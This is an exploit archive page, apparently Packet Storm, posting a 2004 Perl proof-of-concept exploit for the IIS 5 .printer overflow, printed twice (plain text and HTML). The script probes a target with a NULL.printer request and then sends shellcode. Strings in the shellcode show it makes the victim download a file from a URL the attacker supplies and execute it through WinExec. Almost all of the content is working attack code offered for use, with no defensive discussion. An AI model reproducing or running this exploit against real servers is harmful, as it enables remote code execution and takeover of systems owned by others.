exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

iis.pl.txt

iis.pl.txt
Posted Oct 26, 2004
Authored by Diabolic Crab | Site digitalparadox.org

IIS 5 null pointer proof of concept exploit.

tags | exploit, proof of concept
SHA-256 | 80e021ee49bc8b8c86efd67d2904ce71e04ef0648b422b39cee57bf1dfef4527

iis.pl.txt

Change Mirror Download
This is a multi-part message in MIME format.

------=_NextPart_000_001D_01C4B563.F871BDD0
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

http://icis.digitalparadox.org/~dcrab/iis.pl=20
#!/usr/bin/perl -w
use IO::Socket;
print "\n#############################################\n";
print "#IIS 5 Null Printer Exploit by Diabolic Crab#\n";
print "# Shouts to Mr.J Zinho Subby Sync #\n";
print "# Fluidmotion Haking Ta|0n Pheonix #\n";
print "# Phreaked Bread Moth Volcom Sany #\n";
print "# Defcon Ref0rm and everyone els #\n";
print "# C0replay, Hackerscenter, dP #\n";
print "# www.hackerscenter.com #\n";
print "# www.digitalparadox.org #\n";
print "\#############################################\n";
unless ($ARGV[0]) {
print "\n#Usage: $0 hostname filetodownload#\n";
exit();
}
unless ($ARGV[1]) {
print "\n#Usage: $0 hostname filetodownload#\n";
exit();
}
$socket =3D IO::Socket::INET->new(
Proto =3D> 'tcp',
PeerAddr =3D> $ARGV[0],
PeerPort =3D> 80,
Timeout =3D> 10,
);
$bish =3D 0;
$url =3D $ARGV[1];
print "#Connecting to $ARGV[0]\n";
unless($socket) {
die("#Could not connect to $ARGV[0]:80\n");
exit();
}
print "#Connection Established\n";
$socket->autoflush(1);
print $socket ("GET /NULL.printer=20
HTTP/1.1\nClient-Agent:IIS_Printer_Scan\nHost:$ARGV[0]\r\n\r\n");
print "#Packet sent\n";
while ($line =3D <$socket>) {
if ($line eq "<h1>Bad Request</h1>") {
$bish =3D 1
}
}
if ($bish ne 1) {
print "#Server seems to be exploitable\n";
@shell =3D ("\n","GET /NULL.printer HTTP/1.1\n" ,=20
"\xEB\x30\x5F\xFC\x8B\xF7\x80"
,"\x3F\x08\x75\x03\x80\x37\x08\x47\x80\x3F\x01\x75\xF2\x8B\xE6\x33\xD2\xB=
2\x04\xC1"
,"\xE2\x08\x2B\xE2\x8B\xEC\x33\xD2\xB2\x03\xC1\xE2\x08\x2B\xE2\x54\x5A\xB=
2\x7C\x8B"
,"\xE2\xEB\x02\xEB\x57\x89\x75\xFC\x33\xC0\xB4\x40\xC1\xE0\x08\x89\x45\xF=
8\x8B\x40"
,"\x3C\x03\x45\xF8\x8D\x40\x7E\x8B\x40\x02\x03\x45\xF8\x8B\xF8\x8B\x7F\x0=
C\x03\x7D"
,"\xF8\x81\x3F\x4B\x45\x52\x4E\x74\x07\x83\xC0\x14\x8B\xF8\xEB\xEB\x50\x8=
B\xF8\x33"
,"\xC9\x33\xC0\xB1\x10\x8B\x17\x03\x55\xF8\x52\xEB\x03\x57\x8B\xD7\x80\x7=
A\x03\x80"
,"\x74\x16\x8B\x32\x03\x75\xF8\x83\xC6\x02\xEB\x02\xEB\x7E\x8B\x7D\xFC\x5=
1\xF3\xA6"
,"\x59\x5F\x74\x06\x40\x83\xC7\x04\xEB\xDB\x5F\x8B\x7F\x10\x03\x7D\xF8\xC=
1\xE0\x02"
,"\x03\xF8\x8B\x07\x8B\x5D\xFC\x8D\x5B\x11\x53\xFF\xD0\x89\x45\xF4\x8B\x4=
0\x3C\x03"
,"\x45\xF4\x8B\x70\x78\x03\x75\xF4\x8D\x76\x1C\xAD\x03\x45\xF4\x89\x45\xF=
0\xAD\x03"
,"\x45\xF4\x89\x45\xEC\xAD\x03\x45\xF4\x89\x45\xE8\x8B\x55\xEC\x8B\x75\xF=
C\x8D\x76"
,"\x1E\x33\xDB\x33\xC9\xB1\x0F\x8B\x3A\x03\x7D\xF4\x56\x51\xF3\xA6\x59\x5=
E\x74\x06"
,"\x43\x8D\x52\x04\xEB\xED\xD1\xE3\x8B\x75\xE8\x03\xF3\x33\xC9\x66\x8B\x0=
E\xEB\x02"
,"\xEB\x7D\xC1\xE1\x02\x03\x4D\xF0\x8B\x09\x03\x4D\xF4\x89\x4D\xE4\x8B\x5=
D\xFC\x8D"
,"\x5B\x2D\x33\xC9\xB1\x07\x8D\x7D\xE0\x53\x51\x53\x8B\x55\xF4\x52\x8B\x4=
5\xE4\xFC"
,"\xFF\xD0\x59\x5B\xFD\xAB\x8D\x64\x24\xF8\x38\x2B\x74\x03\x43\xEB\xF9\x4=
3\xE2\xE1"
,"\x8B\x45\xE0\x53\xFC\xFF\xD0\xFD\xAB\x33\xC9\xB1\x04\x8D\x5B\x0C\xFC\x5=
3\x51\x53"
,"\x8B\x55\xC4\x52\x8B\x45\xE4\xFF\xD0\x59\x5B\xFD\xAB\x38\x2B\x74\x03\x4=
3\xEB\xF9"
,"\x43\xE2\xE5\xFC\x33\xD2\xB6\x1F\xC1\xE2\x08\x52\x33\xD2\x52\x8B\x45\xD=
4\xFF\xD0"
,"\x89\x45\xB0\x33\xD2\xEB\x02\xEB\x77\x52\x52\x52\x52\x53\x8B\x45\xC0\xF=
F\xD0\x8D"
,"\x5B\x03\x89\x45\xAC\x33\xD2\x52\xB6\x80\xC1\xE2\x10\x52\x33\xD2\x52\x5=
2\x8D\x7B"
,"\x09\x57\x50\x8B\x45\xBC\xFF\xD0\x89\x45\xA8\x8D\x55\xA0\x52\x33\xD2\xB=
6\x1F\xC1"
,"\xE2\x08\x52\x8B\x4D\xB0\x51\x50\x8B\x45\xB8\xFF\xD0\x8B\x4D\xA8\x51\x8=
B\x45\xB4"
,"\xFF\xD0\x8B\x4D\xAC\x51\x8B\x45\xB4\xFF\xD0\x33\xD2\x52\x53\x8B\x45\xD=
C\xFF\xD0"
,"\x89\x45\xA4\x8B\x7D\xA0\x57\x8B\x55\xB0\x52\x50\x8B\x45\xD8\xFF\xD0\x8=
B\x55\xA4"
,"\x52\x8B\x45\xD0\xFF\xD0\xEB\x02\xEB\x12\x33\xD2\x90\x52\x53\x8B\x45\xC=
C\xFF\xD0"
,"\x33\xD2\x52\x8B\x45\xC8\xFF\xD0\xE8\xE6\xFD\xFF\xFF\x47\x65\x74\x4D\x6=
F\x64\x75"
,"\x6C\x65\x48\x61\x6E\x64\x6C\x65\x41\x08\x6B\x65\x72\x6E\x65\x6C\x33\x3=
2\x2E\x64"
,"\x6C\x6C\x08\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\x0=
8\x4C\x6F"
,"\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x08\x5F\x6C\x63\x72\x65\x61\x7=
4\x08\x5F"
,"\x6C\x77\x72\x69\x74\x65\x08\x47\x6C\x6F\x62\x61\x6C\x41\x6C\x6C\x6F\x6=
3\x08\x5F"
,"\x6C\x63\x6C\x6F\x73\x65\x08\x57\x69\x6E\x45\x78\x65\x63\x08\x45\x78\x6=
9\x74\x50"
,"\x72\x6F\x63\x65\x73\x73\x08\x77\x69\x6E\x69\x6E\x65\x74\x2E\x64\x6C\x6=
C\x08\x49"
,"\x6E\x74\x65\x72\x6E\x65\x74\x4F\x70\x65\x6E\x41\x08\x49\x6E\x74\x65\x7=
2\x6E\x65"
,"\x74\x4F\x70\x65\x6E\x55\x72\x6C\x41\x08\x49\x6E\x74\x65\x72\x6E\x65\x7=
4\x52\x65"
,"\x61\x64\x46\x69\x6C\x65\x08\x49\x6E\x74\x65\x72\x6E\x65\x74\x43\x6C\x6=
F\x73\x65"
,"\x48\x61\x6E\x64\x6C\x65\x08\x4E\x53\x08\x6E\x73\x73\x63\x2E\x65\x78\x6=
5\x08"
,"$url"
,"\x08\x01");
$socket2 =3D IO::Socket::INET->new(
Proto =3D> 'tcp',
PeerAddr =3D> $ARGV[0],
PeerPort =3D> 80,
Timeout =3D> 10,
);
foreach $ms(@shell) {
send($socket2, $ms, 0) or die "\n[x] #Unable to send exploit: $!";
sleep(1);
}
print "#Attempting to download file\n";
print "#Exploit sent\n";
close(socket2);
}
if ($bish eq 1) {
print "#Server seems to be not exploitable\n";
}
exit();

------=_NextPart_000_001D_01C4B563.F871BDD0
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=3DContent-Type content=3D"text/html; =
charset=3Diso-8859-1">
<META content=3D"MSHTML 6.00.2900.2523" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV><FONT face=3DArial size=3D2><!--StartFragment --><FONT =
face=3D"Times New Roman"=20
size=3D3><FONT face=3DArial size=3D2><A=20
href=3D"http://icis.digitalparadox.org/~dcrab/iis.pl">http://icis.digital=
paradox.org/~dcrab/iis.pl</A></FONT>&nbsp;</FONT><PRE>#!/usr/bin/perl -w
use IO::Socket;
print "\n#############################################\n";
print "#IIS 5 Null Printer Exploit by Diabolic Crab#\n";
print "# Shouts to Mr.J Zinho Subby Sync #\n";
print "# Fluidmotion Haking Ta|0n Pheonix #\n";
print "# Phreaked Bread Moth Volcom Sany #\n";
print "# Defcon Ref0rm and everyone els #\n";
print "# C0replay, Hackerscenter, dP #\n";
print "# www.hackerscenter.com #\n";
print "# www.digitalparadox.org #\n";
print "\#############################################\n";
unless ($ARGV[0]) {
print "\n#Usage: $0 hostname filetodownload#\n";
exit();
}
unless ($ARGV[1]) {
print "\n#Usage: $0 hostname filetodownload#\n";
exit();
}
$socket =3D IO::Socket::INET->new(
Proto =3D> 'tcp',
PeerAddr =3D> $ARGV[0],
PeerPort =3D> 80,
Timeout =3D> 10,
);
$bish =3D 0;
$url =3D $ARGV[1];
print "#Connecting to $ARGV[0]\n";
unless($socket) {
die("#Could not connect to $ARGV[0]:80\n");
exit();
}
print "#Connection Established\n";
$socket->autoflush(1);
print $socket ("GET /NULL.printer=20
HTTP/1.1\nClient-Agent:IIS_Printer_Scan\nHost:$ARGV[0]\r\n\r\n");
print "#Packet sent\n";
while ($line =3D <$socket>) {
if ($line eq "<h1>Bad Request</h1>") {
$bish =3D 1
}
}
if ($bish ne 1) {
print "#Server seems to be exploitable\n";
@shell =3D ("\n","GET /NULL.printer HTTP/1.1\n" ,=20
"\xEB\x30\x5F\xFC\x8B\xF7\x80"
,"\x3F\x08\x75\x03\x80\x37\x08\x47\x80\x3F\x01\x75\xF2\x8B\xE6\x33\xD2\xB=
2\x04\xC1"
,"\xE2\x08\x2B\xE2\x8B\xEC\x33\xD2\xB2\x03\xC1\xE2\x08\x2B\xE2\x54\x5A\xB=
2\x7C\x8B"
,"\xE2\xEB\x02\xEB\x57\x89\x75\xFC\x33\xC0\xB4\x40\xC1\xE0\x08\x89\x45\xF=
8\x8B\x40"
,"\x3C\x03\x45\xF8\x8D\x40\x7E\x8B\x40\x02\x03\x45\xF8\x8B\xF8\x8B\x7F\x0=
C\x03\x7D"
,"\xF8\x81\x3F\x4B\x45\x52\x4E\x74\x07\x83\xC0\x14\x8B\xF8\xEB\xEB\x50\x8=
B\xF8\x33"
,"\xC9\x33\xC0\xB1\x10\x8B\x17\x03\x55\xF8\x52\xEB\x03\x57\x8B\xD7\x80\x7=
A\x03\x80"
,"\x74\x16\x8B\x32\x03\x75\xF8\x83\xC6\x02\xEB\x02\xEB\x7E\x8B\x7D\xFC\x5=
1\xF3\xA6"
,"\x59\x5F\x74\x06\x40\x83\xC7\x04\xEB\xDB\x5F\x8B\x7F\x10\x03\x7D\xF8\xC=
1\xE0\x02"
,"\x03\xF8\x8B\x07\x8B\x5D\xFC\x8D\x5B\x11\x53\xFF\xD0\x89\x45\xF4\x8B\x4=
0\x3C\x03"
,"\x45\xF4\x8B\x70\x78\x03\x75\xF4\x8D\x76\x1C\xAD\x03\x45\xF4\x89\x45\xF=
0\xAD\x03"
,"\x45\xF4\x89\x45\xEC\xAD\x03\x45\xF4\x89\x45\xE8\x8B\x55\xEC\x8B\x75\xF=
C\x8D\x76"
,"\x1E\x33\xDB\x33\xC9\xB1\x0F\x8B\x3A\x03\x7D\xF4\x56\x51\xF3\xA6\x59\x5=
E\x74\x06"
,"\x43\x8D\x52\x04\xEB\xED\xD1\xE3\x8B\x75\xE8\x03\xF3\x33\xC9\x66\x8B\x0=
E\xEB\x02"
,"\xEB\x7D\xC1\xE1\x02\x03\x4D\xF0\x8B\x09\x03\x4D\xF4\x89\x4D\xE4\x8B\x5=
D\xFC\x8D"
,"\x5B\x2D\x33\xC9\xB1\x07\x8D\x7D\xE0\x53\x51\x53\x8B\x55\xF4\x52\x8B\x4=
5\xE4\xFC"
,"\xFF\xD0\x59\x5B\xFD\xAB\x8D\x64\x24\xF8\x38\x2B\x74\x03\x43\xEB\xF9\x4=
3\xE2\xE1"
,"\x8B\x45\xE0\x53\xFC\xFF\xD0\xFD\xAB\x33\xC9\xB1\x04\x8D\x5B\x0C\xFC\x5=
3\x51\x53"
,"\x8B\x55\xC4\x52\x8B\x45\xE4\xFF\xD0\x59\x5B\xFD\xAB\x38\x2B\x74\x03\x4=
3\xEB\xF9"
,"\x43\xE2\xE5\xFC\x33\xD2\xB6\x1F\xC1\xE2\x08\x52\x33\xD2\x52\x8B\x45\xD=
4\xFF\xD0"
,"\x89\x45\xB0\x33\xD2\xEB\x02\xEB\x77\x52\x52\x52\x52\x53\x8B\x45\xC0\xF=
F\xD0\x8D"
,"\x5B\x03\x89\x45\xAC\x33\xD2\x52\xB6\x80\xC1\xE2\x10\x52\x33\xD2\x52\x5=
2\x8D\x7B"
,"\x09\x57\x50\x8B\x45\xBC\xFF\xD0\x89\x45\xA8\x8D\x55\xA0\x52\x33\xD2\xB=
6\x1F\xC1"
,"\xE2\x08\x52\x8B\x4D\xB0\x51\x50\x8B\x45\xB8\xFF\xD0\x8B\x4D\xA8\x51\x8=
B\x45\xB4"
,"\xFF\xD0\x8B\x4D\xAC\x51\x8B\x45\xB4\xFF\xD0\x33\xD2\x52\x53\x8B\x45\xD=
C\xFF\xD0"
,"\x89\x45\xA4\x8B\x7D\xA0\x57\x8B\x55\xB0\x52\x50\x8B\x45\xD8\xFF\xD0\x8=
B\x55\xA4"
,"\x52\x8B\x45\xD0\xFF\xD0\xEB\x02\xEB\x12\x33\xD2\x90\x52\x53\x8B\x45\xC=
C\xFF\xD0"
,"\x33\xD2\x52\x8B\x45\xC8\xFF\xD0\xE8\xE6\xFD\xFF\xFF\x47\x65\x74\x4D\x6=
F\x64\x75"
,"\x6C\x65\x48\x61\x6E\x64\x6C\x65\x41\x08\x6B\x65\x72\x6E\x65\x6C\x33\x3=
2\x2E\x64"
,"\x6C\x6C\x08\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\x0=
8\x4C\x6F"
,"\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x08\x5F\x6C\x63\x72\x65\x61\x7=
4\x08\x5F"
,"\x6C\x77\x72\x69\x74\x65\x08\x47\x6C\x6F\x62\x61\x6C\x41\x6C\x6C\x6F\x6=
3\x08\x5F"
,"\x6C\x63\x6C\x6F\x73\x65\x08\x57\x69\x6E\x45\x78\x65\x63\x08\x45\x78\x6=
9\x74\x50"
,"\x72\x6F\x63\x65\x73\x73\x08\x77\x69\x6E\x69\x6E\x65\x74\x2E\x64\x6C\x6=
C\x08\x49"
,"\x6E\x74\x65\x72\x6E\x65\x74\x4F\x70\x65\x6E\x41\x08\x49\x6E\x74\x65\x7=
2\x6E\x65"
,"\x74\x4F\x70\x65\x6E\x55\x72\x6C\x41\x08\x49\x6E\x74\x65\x72\x6E\x65\x7=
4\x52\x65"
,"\x61\x64\x46\x69\x6C\x65\x08\x49\x6E\x74\x65\x72\x6E\x65\x74\x43\x6C\x6=
F\x73\x65"
,"\x48\x61\x6E\x64\x6C\x65\x08\x4E\x53\x08\x6E\x73\x73\x63\x2E\x65\x78\x6=
5\x08"
,"$url"
,"\x08\x01");
$socket2 =3D IO::Socket::INET->new(
Proto =3D> 'tcp',
PeerAddr =3D> $ARGV[0],
PeerPort =3D> 80,
Timeout =3D> 10,
);
foreach $ms(@shell) {
send($socket2, $ms, 0) or die "\n[x] #Unable to send exploit: $!";
sleep(1);
}
print "#Attempting to download file\n";
print "#Exploit sent\n";
close(socket2);
}
if ($bish eq 1) {
print "#Server seems to be not exploitable\n";
}
exit();
</PRE></FONT></DIV></BODY></HTML>

------=_NextPart_000_001D_01C4B563.F871BDD0--
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close